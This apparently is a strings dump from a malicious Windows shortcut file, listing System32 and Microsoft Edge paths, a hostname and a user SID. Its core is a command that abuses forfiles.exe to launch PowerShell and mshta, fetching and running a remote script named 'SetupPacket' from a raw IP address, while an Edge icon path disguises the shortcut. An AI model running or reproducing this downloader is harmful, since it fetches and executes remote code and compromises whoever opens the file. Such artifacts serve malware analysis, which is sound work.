Windows
@QVbe.
System32
forfiles.exe
C:\Windows\System32\forfiles.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
win-pddc81ncu8c
[Windows
System32
%forfiles.exe
&..\..\..\Windows\System32\forfiles.exeR/p C:\Windows /m win.ini /c "powershell . mshta http://212.18.104.197/SetupPacket"<C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
S-1-5-21-61346711-1154273391-2987932940-500